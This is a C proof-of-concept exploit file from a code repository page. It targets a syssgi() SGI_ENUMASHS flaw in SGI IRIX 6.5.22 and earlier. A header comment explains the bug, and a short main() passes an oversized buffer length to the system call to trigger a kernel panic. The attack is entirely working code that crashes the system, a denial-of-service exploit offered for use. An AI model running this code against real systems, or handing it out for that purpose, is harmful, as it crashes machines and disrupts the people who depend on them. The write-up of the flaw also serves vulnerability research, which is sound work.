-
Notifications
You must be signed in to change notification settings - Fork 110
/
irix-syssgi-panic.c
37 lines (36 loc) · 1.27 KB
/
irix-syssgi-panic.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/* SGI IRIX <= 6.5.22 syssgi() SGI_ENUMASHS kernel panic
* =====================================================
* SGI implemented their own BSD system call "syssgi" for
* debug and diagnositics of IRIX. A vulnerability exists
* in the handling of SGI_ENUMASHS request when handling
* a large sized argument. The system call passes the input
* directly to kern_calloc(); without error checking.
* Supplying an oversized length argument will cause the
* kernel heap allocator to fail and return NULL. This
* results in a kernel panic denial-of-service condition
* due to a read on NULL page passed to a copyout() call
*
* -- HackerFantastic
* (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/syssgi.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
int main(int argc,char* argv[]){
int fd;
ssize_t out;
char* output_buffer;
unsigned int bufsize = 67107840;
printf("[ IRIX <= 6.5.22 syssgi() SGI_ENUMASHS kernel panic!\n");
output_buffer = malloc(bufsize);
if(!output_buffer){
printf("malloc() failure\n");
exit(0);
}
out = syssgi(SGI_ENUMASHS,output_buffer,bufsize);
printf("process survived kernel_calloc() - not vulnerable?\n");
exit(0);
}